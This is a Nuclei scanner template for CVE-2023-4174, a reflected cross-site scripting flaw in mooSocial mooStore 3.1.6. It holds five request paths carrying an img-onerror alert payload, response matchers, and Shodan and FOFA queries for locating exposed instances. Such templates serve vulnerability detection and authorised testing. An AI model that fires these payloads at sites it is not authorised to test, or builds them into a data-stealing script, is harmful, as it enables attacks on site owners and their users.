nuclei-templates/http/cves/2023/CVE-2023-4174.yaml

60 lines
2.6 KiB
YAML
Raw Normal View History

2023-08-08 21:02:42 +00:00
id: CVE-2023-4174
info:
name: mooSocial 3.1.6 - Reflected Cross Site Scripting
author: momika233
severity: medium
description: |
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:43:37 +00:00
remediation: |
Upgrade to the latest version of mooSocial or apply the vendor-provided patch to fix the XSS vulnerability.
2023-08-08 21:02:42 +00:00
reference:
- https://www.exploit-db.com/exploits/51671
- https://nvd.nist.gov/vuln/detail/CVE-2023-4174
- https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
2023-08-31 11:46:18 +00:00
- https://vuldb.com/?ctiid.236209
- https://vuldb.com/?id.236209
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4174
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.00302
epss-percentile: 0.69562
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:*
2023-08-08 21:02:42 +00:00
metadata:
verified: true
2023-09-06 11:43:37 +00:00
max-request: 5
2023-08-31 11:46:18 +00:00
vendor: moosocial
product: moostore
2024-05-31 19:23:20 +00:00
shodan-query: http.favicon.hash:"702863115"
2023-09-06 11:43:37 +00:00
fofa-query: icon_hash="702863115"
2024-01-14 09:21:50 +00:00
tags: cve,cve2023,packetstorm,moosocial,xss
2023-08-08 21:02:42 +00:00
http:
- method: GET
path:
- '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
- '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
- '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
- '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
- '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'
stop-at-first-match: true
2023-08-31 11:46:18 +00:00
2023-08-08 21:02:42 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=a onerror=alert(document.domain)>ridxm"
- "mooSocial"
condition: and
- type: word
part: header
words:
2023-08-31 11:46:18 +00:00
- "text/html"
# digest: 4a0a0047304502210083964b313e7a000d9ca10222db41e2eee010e7cd8de85ee18f2db5cad563203a022032222c84acefa05972a5e7cbc5abe8dc5b06bb5c6fe3f3a7f3dbfe496185e9a6:922c64590222798bb761d5b6d8e72950